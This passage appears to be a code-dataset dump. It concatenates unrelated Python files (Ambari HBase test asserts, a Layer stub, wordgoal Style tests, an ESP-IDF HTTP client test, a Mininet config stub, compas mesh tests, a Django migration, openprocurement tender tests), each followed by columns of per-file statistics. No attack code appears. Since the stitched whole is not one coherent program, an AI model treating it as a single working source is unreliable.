self.assertResourceCalled('XmlConfig', 'hdfs-site.xml',
owner = 'hbase',
group = 'hadoop',
conf_dir = '/etc/hbase/conf',
configurations = self.getConfig()['configurations']['hdfs-site'], # don't hardcode all the properties
)
self.assertResourceCalled('XmlConfig', 'hdfs-site.xml',
owner = 'hdfs',
group = 'hadoop',
conf_dir = '/etc/hadoop/conf',
configurations = self.getConfig()['configurations']['hdfs-site'], # don't hardcode all the properties
)
self.assertResourceCalled('File', '/etc/hbase/conf/hbase-policy.xml',
owner = 'hbase',
group = 'hadoop',
)
self.assertResourceCalled('TemplateConfig', '/etc/hbase/conf/hbase-env.sh',
owner = 'hbase',
template_tag = None,
)
self.assertResourceCalled('TemplateConfig', '/etc/hbase/conf/hadoop-metrics2-hbase.properties',
owner = 'hbase',
template_tag = 'GANGLIA-RS',
)
self.assertResourceCalled('TemplateConfig', '/etc/hbase/conf/regionservers',
owner = 'hbase',
template_tag = None,
)
self.assertResourceCalled('Directory', '/var/run/hbase',
owner = 'hbase',
recursive = True,
)
self.assertResourceCalled('Directory', '/var/log/hbase',
owner = 'hbase',
recursive = True,
)
self.assertResourceCalled('File',
'/etc/hbase/conf/log4j.properties',
mode=0644,
group='hadoop',
owner='hbase',
content='log4jproperties\nline2'
)
self.assertResourceCalled('HdfsDirectory', 'hdfs://c6401.ambari.apache.org:8020/apps/hbase/data',
security_enabled = False,
keytab = UnknownConfigurationMock(),
conf_dir = '/etc/hadoop/conf',
hdfs_user = 'hdfs',
kinit_path_local = '/usr/bin/kinit',
owner = 'hbase',
action = ['create_delayed'],
)
self.assertResourceCalled('HdfsDirectory', '/apps/hbase/staging',
security_enabled = False,
keytab = UnknownConfigurationMock(),
conf_dir = '/etc/hadoop/conf',
hdfs_user = 'hdfs',
kinit_path_local = '/usr/bin/kinit',
mode = 0711,
owner = 'hbase',
action = ['create_delayed'],
)
self.assertResourceCalled('HdfsDirectory', None,
security_enabled = False,
keytab = UnknownConfigurationMock(),
conf_dir = '/etc/hadoop/conf',
hdfs_user = 'hdfs',
kinit_path_local = '/usr/bin/kinit',
action = ['create'],
)
def assert_configure_secured(self):
self.assertResourceCalled('Directory', '/etc/hbase/conf',
owner = 'hbase',
group = 'hadoop',
recursive = True,
)
self.assertResourceCalled('Directory', '/hadoop/hbase',
owner = 'hbase',
recursive = True,
)
self.assertResourceCalled('Directory', '/hadoop/hbase/local/jars',
owner = 'hbase',
group = 'hadoop',
mode=0775,
recursive = True,
)
self.assertResourceCalled('XmlConfig', 'hbase-site.xml',
owner = 'hbase',
group = 'hadoop',
conf_dir = '/etc/hbase/conf',
configurations = self.getConfig()['configurations']['hbase-site'], # don't hardcode all the properties
)
self.assertResourceCalled('XmlConfig', 'hdfs-site.xml',
owner = 'hbase',
group = 'hadoop',
conf_dir = '/etc/hbase/conf',
configurations = self.getConfig()['configurations']['hdfs-site'], # don't hardcode all the properties
)
self.assertResourceCalled('XmlConfig', 'hdfs-site.xml',
owner = 'hdfs',
group = 'hadoop',
conf_dir = '/etc/hadoop/conf',
configurations = self.getConfig()['configurations']['hdfs-site'], # don't hardcode all the properties
)
self.assertResourceCalled('File', '/etc/hbase/conf/hbase-policy.xml',
owner = 'hbase',
group = 'hadoop',
)
self.assertResourceCalled('TemplateConfig', '/etc/hbase/conf/hbase-env.sh',
owner = 'hbase',
template_tag = None,
)
self.assertResourceCalled('TemplateConfig', '/etc/hbase/conf/hadoop-metrics2-hbase.properties',
owner = 'hbase',
template_tag = 'GANGLIA-RS',
)
self.assertResourceCalled('TemplateConfig', '/etc/hbase/conf/regionservers',
owner = 'hbase',
template_tag = None,
)
self.assertResourceCalled('TemplateConfig', '/etc/hbase/conf/hbase_regionserver_jaas.conf',
owner = 'hbase',
template_tag = None,
)
self.assertResourceCalled('Directory', '/var/run/hbase',
owner = 'hbase',
recursive = True,
)
self.assertResourceCalled('Directory', '/var/log/hbase',
owner = 'hbase',
recursive = True,
)
self.assertResourceCalled('File',
'/etc/hbase/conf/log4j.properties',
mode=0644,
group='hadoop',
owner='hbase',
content='log4jproperties\nline2'
)
self.assertResourceCalled('HdfsDirectory', 'hdfs://c6401.ambari.apache.org:8020/apps/hbase/data',
security_enabled = True,
keytab = '/etc/security/keytabs/hdfs.headless.keytab',
conf_dir = '/etc/hadoop/conf',
hdfs_user = 'hdfs',
kinit_path_local = '/usr/bin/kinit',
owner = 'hbase',
action = ['create_delayed'],
)
self.assertResourceCalled('HdfsDirectory', '/apps/hbase/staging',
security_enabled = True,
keytab = '/etc/security/keytabs/hdfs.headless.keytab',
conf_dir = '/etc/hadoop/conf',
hdfs_user = 'hdfs',
kinit_path_local = '/usr/bin/kinit',
mode = 0711,
owner = 'hbase',
action = ['create_delayed'],
)
self.assertResourceCalled('HdfsDirectory', None,
security_enabled = True,
keytab = '/etc/security/keytabs/hdfs.headless.keytab',
conf_dir = '/etc/hadoop/conf',
hdfs_user = 'hdfs',
kinit_path_local = '/usr/bin/kinit',
action = ['create'],
)
| 42.02027
| 218
| 0.568419
| 1,197
| 12,438
| 5.831245
| 0.163743
| 0.134097
| 0.036103
| 0.027507
| 0.876361
| 0.8649
| 0.8649
| 0.864183
| 0.864183
| 0.841834
| 0
| 0.010665
| 0.30648
| 12,438
| 295
| 219
| 42.162712
| 0.798516
| 0.018009
| 0
| 0.773077
| 0
| 0.030769
| 0.325848
| 0.149249
| 0
| 0
| 0
| 0
| 0.196154
| 0
| null | null | 0
| 0.007692
| null | null | 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
7cc6dc8673b28672bfe9478805260b1e39f378ab
| 175
|
py
|
Python
|
training_scripts/layers/layer.py
|
Rufaim/Ranker-Net
|
a3100d7c5b0b51ad764abb8025f299be29b2f688
|
[
"MIT"
] | null | null | null |
training_scripts/layers/layer.py
|
Rufaim/Ranker-Net
|
a3100d7c5b0b51ad764abb8025f299be29b2f688
|
[
"MIT"
] | null | null | null |
training_scripts/layers/layer.py
|
Rufaim/Ranker-Net
|
a3100d7c5b0b51ad764abb8025f299be29b2f688
|
[
"MIT"
] | null | null | null |
class Layer(object):
def __call__(self,*args,**kwargs):
raise NotImplementedError("not implemented")
def to_json(self,sess):
raise NotImplementedError("not implemented")
| 35
| 46
| 0.771429
| 21
| 175
| 6.190476
| 0.714286
| 0.369231
| 0.415385
| 0.584615
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.097143
| 175
| 5
| 47
| 35
| 0.822785
| 0
| 0
| 0.4
| 0
| 0
| 0.170455
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.4
| false
| 0
| 0
| 0
| 0.6
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 7
|
7cce28afec3d7fef41f3d6cc18fe33b6fe4ba206
| 2,819
|
py
|
Python
|
tests/config/test_style.py
|
cariad/wordgoal
|
46478f176e1947443107bc8eb2aa254b9c569d2d
|
[
"MIT"
] | null | null | null |
tests/config/test_style.py
|
cariad/wordgoal
|
46478f176e1947443107bc8eb2aa254b9c569d2d
|
[
"MIT"
] | 4
|
2021-03-14T18:05:56.000Z
|
2021-03-16T14:41:32.000Z
|
tests/config/test_style.py
|
cariad/wordgoal
|
46478f176e1947443107bc8eb2aa254b9c569d2d
|
[
"MIT"
] | null | null | null |
from pytest import mark
from wordgoal.config import Style
@mark.parametrize(
"style, expect",
[
(Style(parent=None, values=None), True),
(
Style(
parent=Style(parent=None, values={"color": True}),
values=None,
),
True,
),
(
Style(
parent=Style(parent=None, values={"color": False}),
values=None,
),
False,
),
(
Style(
parent=Style(parent=None, values={"color": False}),
values={"color": True},
),
True,
),
(
Style(
parent=Style(parent=None, values={"color": True}),
values={"color": False},
),
False,
),
],
)
def test_color(style: Style, expect: int) -> None:
assert style.color == expect
@mark.parametrize(
"style, expect",
[
(Style(parent=None, values=None), True),
(
Style(
parent=Style(parent=None, values={"fractions": True}),
values=None,
),
True,
),
(
Style(
parent=Style(parent=None, values={"fractions": False}),
values=None,
),
False,
),
(
Style(
parent=Style(parent=None, values={"fractions": False}),
values={"fractions": True},
),
True,
),
(
Style(
parent=Style(parent=None, values={"fractions": True}),
values={"fractions": False},
),
False,
),
],
)
def test_fractions(style: Style, expect: int) -> None:
assert style.fractions == expect
@mark.parametrize(
"style, expect",
[
(Style(parent=None, values=None), False),
(
Style(
parent=Style(parent=None, values={"percentages": True}),
values=None,
),
True,
),
(
Style(
parent=Style(parent=None, values={"percentages": False}),
values=None,
),
False,
),
(
Style(
parent=Style(parent=None, values={"percentages": False}),
values={"percentages": True},
),
True,
),
(
Style(
parent=Style(parent=None, values={"percentages": True}),
values={"percentages": False},
),
False,
),
],
)
def test_percentages(style: Style, expect: int) -> None:
assert style.percentages == expect
| 23.889831
| 73
| 0.41646
| 213
| 2,819
| 5.497653
| 0.098592
| 0.253629
| 0.192143
| 0.269001
| 0.824082
| 0.824082
| 0.824082
| 0.736977
| 0.723313
| 0.628523
| 0
| 0
| 0.45016
| 2,819
| 117
| 74
| 24.094017
| 0.755484
| 0
| 0
| 0.7
| 0
| 0
| 0.067045
| 0
| 0
| 0
| 0
| 0
| 0.027273
| 1
| 0.027273
| false
| 0
| 0.018182
| 0
| 0.045455
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
7ce194c2663dce569c1bd6fae0a4a937f5c96a8a
| 3,658
|
py
|
Python
|
examples/protocols/esp_http_client/esp_http_client_test.py
|
DCNick3/esp-idf
|
b0150615dff529662772a60dcb57d5b559f480e2
|
[
"Apache-2.0"
] | 2
|
2020-02-14T07:14:41.000Z
|
2020-03-03T09:37:20.000Z
|
examples/protocols/esp_http_client/esp_http_client_test.py
|
DCNick3/esp-idf
|
b0150615dff529662772a60dcb57d5b559f480e2
|
[
"Apache-2.0"
] | null | null | null |
examples/protocols/esp_http_client/esp_http_client_test.py
|
DCNick3/esp-idf
|
b0150615dff529662772a60dcb57d5b559f480e2
|
[
"Apache-2.0"
] | 1
|
2021-01-26T13:40:20.000Z
|
2021-01-26T13:40:20.000Z
|
import re
import os
import ttfw_idf
@ttfw_idf.idf_example_test(env_tag="Example_EthKitV1")
def test_examples_protocol_esp_http_client(env, extra_data):
"""
steps: |
1. join AP
2. Send HTTP request to httpbin.org
"""
dut1 = env.get_dut("esp_http_client", "examples/protocols/esp_http_client", dut_class=ttfw_idf.ESP32DUT)
# check and log bin size
binary_file = os.path.join(dut1.app.binary_path, "esp-http-client-example.bin")
bin_size = os.path.getsize(binary_file)
ttfw_idf.log_performance("esp_http_client_bin_size", "{}KB".format(bin_size // 1024))
# start test
dut1.start_app()
dut1.expect("Connected to AP, begin http example", timeout=30)
dut1.expect(re.compile(r"HTTP GET Status = 200, content_length = (\d)"))
dut1.expect(re.compile(r"HTTP POST Status = 200, content_length = (\d)"))
dut1.expect(re.compile(r"HTTP PUT Status = 200, content_length = (\d)"))
dut1.expect(re.compile(r"HTTP PATCH Status = 200, content_length = (\d)"))
dut1.expect(re.compile(r"HTTP DELETE Status = 200, content_length = (\d)"))
dut1.expect(re.compile(r"HTTP HEAD Status = 200, content_length = (\d)"))
dut1.expect(re.compile(r"HTTP Basic Auth Status = 200, content_length = (\d)"))
dut1.expect(re.compile(r"HTTP Basic Auth redirect Status = 200, content_length = (\d)"))
dut1.expect(re.compile(r"HTTP Digest Auth Status = 200, content_length = (\d)"))
dut1.expect(re.compile(r"HTTPS Status = 200, content_length = (\d)"))
dut1.expect(re.compile(r"HTTP chunk encoding Status = 200, content_length = (-?\d)"))
# content-len for chunked encoding is typically -1, could be a positive length in some cases
dut1.expect(re.compile(r"HTTP Stream reader Status = 200, content_length = (\d)"))
dut1.expect(re.compile(r"Last esp error code: 0x8001"))
dut1.expect("Finish http example")
# test mbedtls dynamic resource
dut1 = env.get_dut("esp_http_client", "examples/protocols/esp_http_client", dut_class=ttfw_idf.ESP32DUT, app_config_name='ssldyn')
# check and log bin size
binary_file = os.path.join(dut1.app.binary_path, "esp-http-client-example.bin")
bin_size = os.path.getsize(binary_file)
ttfw_idf.log_performance("esp_http_client_bin_size", "{}KB".format(bin_size // 1024))
# start test
dut1.start_app()
dut1.expect("Connected to AP, begin http example", timeout=30)
dut1.expect(re.compile(r"HTTP GET Status = 200, content_length = (\d)"))
dut1.expect(re.compile(r"HTTP POST Status = 200, content_length = (\d)"))
dut1.expect(re.compile(r"HTTP PUT Status = 200, content_length = (\d)"))
dut1.expect(re.compile(r"HTTP PATCH Status = 200, content_length = (\d)"))
dut1.expect(re.compile(r"HTTP DELETE Status = 200, content_length = (\d)"))
dut1.expect(re.compile(r"HTTP HEAD Status = 200, content_length = (\d)"))
dut1.expect(re.compile(r"HTTP Basic Auth Status = 200, content_length = (\d)"))
dut1.expect(re.compile(r"HTTP Basic Auth redirect Status = 200, content_length = (\d)"))
dut1.expect(re.compile(r"HTTP Digest Auth Status = 200, content_length = (\d)"))
dut1.expect(re.compile(r"HTTPS Status = 200, content_length = (\d)"))
dut1.expect(re.compile(r"HTTP chunk encoding Status = 200, content_length = (-?\d)"))
# content-len for chunked encoding is typically -1, could be a positive length in some cases
dut1.expect(re.compile(r"HTTP Stream reader Status = 200, content_length = (\d)"))
dut1.expect(re.compile(r"Last esp error code: 0x8001"))
dut1.expect("Finish http example")
if __name__ == '__main__':
test_examples_protocol_esp_http_client()
| 55.424242
| 134
| 0.698196
| 558
| 3,658
| 4.417563
| 0.179211
| 0.121704
| 0.126572
| 0.200406
| 0.926572
| 0.926572
| 0.899797
| 0.899797
| 0.899797
| 0.899797
| 0
| 0.045042
| 0.15637
| 3,658
| 65
| 135
| 56.276923
| 0.753727
| 0.092947
| 0
| 0.808511
| 0
| 0
| 0.478102
| 0.051703
| 0
| 0
| 0.00365
| 0
| 0
| 1
| 0.021277
| false
| 0
| 0.06383
| 0
| 0.085106
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
7cedcdc9b5b3e9cd899e568c98bcbba4b2513e16
| 517
|
py
|
Python
|
network-manager/config/null.py
|
netx-ulx/varanus
|
7df5ec70563253d72a4287566b1fbb6bdf804a4c
|
[
"Apache-2.0"
] | null | null | null |
network-manager/config/null.py
|
netx-ulx/varanus
|
7df5ec70563253d72a4287566b1fbb6bdf804a4c
|
[
"Apache-2.0"
] | null | null | null |
network-manager/config/null.py
|
netx-ulx/varanus
|
7df5ec70563253d72a4287566b1fbb6bdf804a4c
|
[
"Apache-2.0"
] | null | null | null |
def pre_start_config( _mr, _extra_args, _local_varanus_home ):
""" Configure a MininetRunner object before Mininet starts.
- mr : a MininetRunner object
- extra_args: extra arguments passed by the command line
"""
return True
def post_start_config( _mr, _extra_args, _local_varanus_home ):
""" Configure a MininetRunner object after Mininet starts.
- mr : a MininetRunner object
- extra_args: extra arguments passed by the command line
"""
pass
| 34.466667
| 64
| 0.676983
| 63
| 517
| 5.269841
| 0.444444
| 0.108434
| 0.240964
| 0.108434
| 0.885542
| 0.885542
| 0.885542
| 0.885542
| 0.885542
| 0.885542
| 0
| 0
| 0.261122
| 517
| 14
| 65
| 36.928571
| 0.86911
| 0.576402
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| false
| 0.25
| 0
| 0
| 0.75
| 0
| 0
| 0
| 0
| null | 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 1
| 0
|
0
| 10
|
7ceec284c453f747b836c22022b37f8a529e3357
| 89
|
py
|
Python
|
convert/__init__.py
|
willismonroe/cdli-accounting-viz
|
cb7f8d2ec4b8ddbd831486fcf25a3ab7e65290e7
|
[
"MIT"
] | 3
|
2020-06-04T17:07:44.000Z
|
2020-06-15T19:45:31.000Z
|
convert/__init__.py
|
willismonroe/cdli-accounting-viz
|
cb7f8d2ec4b8ddbd831486fcf25a3ab7e65290e7
|
[
"MIT"
] | 17
|
2020-06-02T20:03:43.000Z
|
2020-08-27T18:47:36.000Z
|
convert/__init__.py
|
willismonroe/cdli-accounting-viz
|
cb7f8d2ec4b8ddbd831486fcf25a3ab7e65290e7
|
[
"MIT"
] | 3
|
2020-06-04T17:42:33.000Z
|
2020-08-26T19:27:50.000Z
|
import convert.number_system
import convert.convert_susa
import convert.convert_sumerian
| 22.25
| 31
| 0.898876
| 12
| 89
| 6.416667
| 0.5
| 0.506494
| 0.519481
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.067416
| 89
| 3
| 32
| 29.666667
| 0.927711
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
6b369832ddfab685eb884cdb757e5e8c160e6cbd
| 2,247
|
py
|
Python
|
tests/compas/datastructures/test_mesh_subd.py
|
XingxinHE/compas
|
d2901dbbacdaf4694e5adae78ba8f093f10532bf
|
[
"MIT"
] | 235
|
2017-11-07T07:33:22.000Z
|
2022-03-25T16:20:00.000Z
|
tests/compas/datastructures/test_mesh_subd.py
|
XingxinHE/compas
|
d2901dbbacdaf4694e5adae78ba8f093f10532bf
|
[
"MIT"
] | 770
|
2017-09-22T13:42:06.000Z
|
2022-03-31T21:26:45.000Z
|
tests/compas/datastructures/test_mesh_subd.py
|
XingxinHE/compas
|
d2901dbbacdaf4694e5adae78ba8f093f10532bf
|
[
"MIT"
] | 99
|
2017-11-06T23:15:28.000Z
|
2022-03-25T16:05:36.000Z
|
import pytest
from compas.datastructures import Mesh
@pytest.fixture
def mesh_tris():
mesh = Mesh.from_polyhedron(6)
mesh.quads_to_triangles()
return mesh
@pytest.fixture
def mesh_quads():
mesh = Mesh.from_polyhedron(6)
return mesh
def test_quads_subdivide(mesh_quads):
subd = mesh_quads.subdivide()
assert subd.number_of_faces() == 4 * mesh_quads.number_of_faces()
assert subd.number_of_vertices() == (mesh_quads.number_of_vertices() +
mesh_quads.number_of_edges() +
mesh_quads.number_of_faces())
def test_tris_subdivide(mesh_tris):
subd = mesh_tris.subdivide()
assert subd.number_of_faces() == 3 * mesh_tris.number_of_faces()
assert subd.number_of_vertices() == (mesh_tris.number_of_vertices() +
mesh_tris.number_of_edges() +
mesh_tris.number_of_faces())
def test_quads_subdivide_tri(mesh_quads):
subd = mesh_quads.subdivide(scheme='tri')
assert subd.number_of_faces() == 4 * mesh_quads.number_of_faces()
assert subd.number_of_vertices() == mesh_quads.number_of_vertices() + mesh_quads.number_of_faces()
def test_tris_subdivide_tri(mesh_tris):
subd = mesh_tris.subdivide(scheme='tri')
assert subd.number_of_faces() == 3 * mesh_tris.number_of_faces()
assert subd.number_of_vertices() == mesh_tris.number_of_vertices() + mesh_tris.number_of_faces()
def test_quads_subdivide_quad(mesh_quads):
subd = mesh_quads.subdivide(scheme='quad')
assert subd.number_of_faces() == 4 * mesh_quads.number_of_faces()
assert subd.number_of_vertices() == (mesh_quads.number_of_vertices() +
mesh_quads.number_of_edges() +
mesh_quads.number_of_faces())
def test_tris_subdivide_quad(mesh_tris):
subd = mesh_tris.subdivide(scheme='quad')
assert subd.number_of_faces() == 3 * mesh_tris.number_of_faces()
assert subd.number_of_vertices() == (mesh_tris.number_of_vertices() +
mesh_tris.number_of_edges() +
mesh_tris.number_of_faces())
| 36.836066
| 102
| 0.64575
| 283
| 2,247
| 4.689046
| 0.102474
| 0.204974
| 0.176338
| 0.162773
| 0.908063
| 0.837227
| 0.792012
| 0.728711
| 0.672947
| 0.618689
| 0
| 0.00477
| 0.253672
| 2,247
| 60
| 103
| 37.45
| 0.786524
| 0
| 0
| 0.55814
| 0
| 0
| 0.006231
| 0
| 0
| 0
| 0
| 0
| 0.27907
| 1
| 0.186047
| false
| 0
| 0.046512
| 0
| 0.27907
| 0
| 0
| 0
| 0
| null | 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
8633d5ea8314a6bddcc80c7ee880e3b9c12ae265
| 1,844
|
py
|
Python
|
pywolf/migrations/0018_auto_20180722_2259.py
|
tevawolf/pywolf
|
94e3c26d8c3b279990624f23658e22ab00eead46
|
[
"BSD-3-Clause"
] | null | null | null |
pywolf/migrations/0018_auto_20180722_2259.py
|
tevawolf/pywolf
|
94e3c26d8c3b279990624f23658e22ab00eead46
|
[
"BSD-3-Clause"
] | null | null | null |
pywolf/migrations/0018_auto_20180722_2259.py
|
tevawolf/pywolf
|
94e3c26d8c3b279990624f23658e22ab00eead46
|
[
"BSD-3-Clause"
] | null | null | null |
# Generated by Django 2.0.6 on 2018-07-22 13:59
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('pywolf', '0017_villageparticipantvoice_voice_order'),
]
operations = [
migrations.AddField(
model_name='mvoicesetting',
name='max_str_length',
field=models.SmallIntegerField(default=0),
),
migrations.AddField(
model_name='mvoicesetting',
name='max_voice_point',
field=models.SmallIntegerField(default=0),
),
migrations.AddField(
model_name='villagevoicesetting',
name='max_str_length',
field=models.SmallIntegerField(default=0),
),
migrations.AddField(
model_name='villagevoicesetting',
name='max_voice_point',
field=models.SmallIntegerField(default=0),
),
migrations.AlterField(
model_name='villagevoicesetting',
name='epilogue_limit_off_flg',
field=models.BooleanField(default=True),
),
migrations.AlterField(
model_name='villagevoicesetting',
name='prologue_limit_off_flg',
field=models.BooleanField(default=False),
),
migrations.AlterField(
model_name='villagevoicesetting',
name='tomb_limit_off_flg',
field=models.BooleanField(default=False),
),
migrations.AlterField(
model_name='villagevoicesetting',
name='voice_number',
field=models.SmallIntegerField(default=0),
),
migrations.AlterField(
model_name='villagevoicesetting',
name='voice_point',
field=models.SmallIntegerField(default=0),
),
]
| 31.254237
| 63
| 0.590564
| 156
| 1,844
| 6.782051
| 0.314103
| 0.07656
| 0.185255
| 0.21172
| 0.814745
| 0.814745
| 0.765595
| 0.628544
| 0.628544
| 0.628544
| 0
| 0.019577
| 0.307484
| 1,844
| 58
| 64
| 31.793103
| 0.808927
| 0.024403
| 0
| 0.75
| 1
| 0
| 0.193656
| 0.046745
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.019231
| 0
| 0.076923
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
8675c8985cc9bcd8153ffb38062793bdc11a4fd0
| 67,852
|
py
|
Python
|
openprocurement/tender/limited/tests/tender_blanks.py
|
ProzorroUKR/openprocurement.tender.limited
|
cab6d0079c1ed9c54ce72a933ea8b26e6307a044
|
[
"Apache-2.0"
] | null | null | null |
openprocurement/tender/limited/tests/tender_blanks.py
|
ProzorroUKR/openprocurement.tender.limited
|
cab6d0079c1ed9c54ce72a933ea8b26e6307a044
|
[
"Apache-2.0"
] | 4
|
2018-08-14T19:40:57.000Z
|
2019-01-25T05:42:04.000Z
|
openprocurement/tender/limited/tests/tender_blanks.py
|
ProzorroUKR/openprocurement.tender.limited
|
cab6d0079c1ed9c54ce72a933ea8b26e6307a044
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
from copy import deepcopy
from uuid import uuid4
from openprocurement.api.utils import get_now
from openprocurement.api.constants import ROUTE_PREFIX, CPV_ITEMS_CLASS_FROM, \
NOT_REQUIRED_ADDITIONAL_CLASSIFICATION_FROM
from openprocurement.tender.belowthreshold.tests.base import test_organization
from openprocurement.tender.limited.models import (
NegotiationTender,
NegotiationQuickTender,
ReportingTender
)
# AccreditationTenderTest
def create_tender_accreditation(self):
for broker in ['broker1', 'broker3']:
self.app.authorization = ('Basic', (broker, ''))
response = self.app.post_json('/tenders', {"data": self.initial_data})
self.assertEqual(response.status, '201 Created')
self.assertEqual(response.content_type, 'application/json')
for broker in ['broker2', 'broker4']:
self.app.authorization = ('Basic', (broker, ''))
response = self.app.post_json('/tenders', {"data": self.initial_data}, status=403)
self.assertEqual(response.status, '403 Forbidden')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(response.json['errors'][0]["description"],
"Broker Accreditation level does not permit tender creation")
self.app.authorization = ('Basic', ('broker1t', ''))
response = self.app.post_json('/tenders', {"data": self.initial_data}, status=403)
self.assertEqual(response.status, '403 Forbidden')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(response.json['errors'][0]["description"],
"Broker Accreditation level does not permit tender creation")
# TenderTest
def simple_add_tender(self):
u = ReportingTender(self.initial_data)
u.tenderID = "UA-X"
assert u.id is None
assert u.rev is None
u.store(self.db)
assert u.id is not None
assert u.rev is not None
fromdb = self.db.get(u.id)
assert u.tenderID == fromdb['tenderID']
assert u.doc_type == "Tender"
assert u.procurementMethodType == "reporting"
assert u.procurementMethodType == fromdb['procurementMethodType']
u.delete_instance(self.db)
# TenderNegotiationTest
def simple_add_tender_negotiation(self):
u = NegotiationTender(self.initial_data)
u.tenderID = "UA-X"
assert u.id is None
assert u.rev is None
u.store(self.db)
assert u.id is not None
assert u.rev is not None
fromdb = self.db.get(u.id)
assert u.tenderID == fromdb['tenderID']
assert u.doc_type == "Tender"
assert u.procurementMethodType == "negotiation"
assert u.procurementMethodType == fromdb['procurementMethodType']
u.delete_instance(self.db)
# TenderNegotiationQuickTest
def simple_add_tender_negotiation_quick(self):
u = NegotiationQuickTender(self.initial_data)
u.tenderID = "UA-X"
assert u.id is None
assert u.rev is None
u.store(self.db)
assert u.id is not None
assert u.rev is not None
fromdb = self.db.get(u.id)
assert u.tenderID == fromdb['tenderID']
assert u.doc_type == "Tender"
assert u.procurementMethodType == "negotiation.quick"
assert u.procurementMethodType == fromdb['procurementMethodType']
u.delete_instance(self.db)
# TenderResourceTest
def listing(self):
response = self.app.get('/tenders')
self.assertEqual(response.status, '200 OK')
self.assertEqual(len(response.json['data']), 0)
tenders = []
for i in range(3):
offset = get_now().isoformat()
response = self.app.post_json('/tenders', {'data': self.initial_data})
self.assertEqual(response.status, '201 Created')
self.assertEqual(response.content_type, 'application/json')
tenders.append(response.json['data'])
ids = ','.join([i['id'] for i in tenders])
while True:
response = self.app.get('/tenders')
self.assertTrue(ids.startswith(','.join([i['id'] for i in response.json['data']])))
if len(response.json['data']) == 3:
break
self.assertEqual(len(response.json['data']), 3)
self.assertEqual(set(response.json['data'][0]), set([u'id', u'dateModified']))
self.assertEqual(set([i['id'] for i in response.json['data']]), set([i['id'] for i in tenders]))
self.assertEqual(set([i['dateModified'] for i in response.json['data']]),
set([i['dateModified'] for i in tenders]))
self.assertEqual([i['dateModified'] for i in response.json['data']],
sorted([i['dateModified'] for i in tenders]))
while True:
response = self.app.get('/tenders?offset={}'.format(offset))
self.assertEqual(response.status, '200 OK')
if len(response.json['data']) == 1:
break
self.assertEqual(len(response.json['data']), 1)
response = self.app.get('/tenders?limit=2')
self.assertEqual(response.status, '200 OK')
self.assertNotIn('prev_page', response.json)
self.assertEqual(len(response.json['data']), 2)
response = self.app.get(response.json['next_page']['path'].replace(ROUTE_PREFIX, ''))
self.assertEqual(response.status, '200 OK')
self.assertIn('descending=1', response.json['prev_page']['uri'])
self.assertEqual(len(response.json['data']), 1)
response = self.app.get(response.json['next_page']['path'].replace(ROUTE_PREFIX, ''))
self.assertEqual(response.status, '200 OK')
self.assertIn('descending=1', response.json['prev_page']['uri'])
self.assertEqual(len(response.json['data']), 0)
response = self.app.get('/tenders', params=[('opt_fields', 'status')])
self.assertEqual(response.status, '200 OK')
self.assertEqual(len(response.json['data']), 3)
self.assertEqual(set(response.json['data'][0]), set([u'id', u'dateModified', u'status']))
self.assertIn('opt_fields=status', response.json['next_page']['uri'])
response = self.app.get('/tenders', params=[('opt_fields', 'status')])
self.assertEqual(response.status, '200 OK')
self.assertEqual(len(response.json['data']), 3)
self.assertEqual(set(response.json['data'][0]), set([u'id', u'dateModified', u'status']))
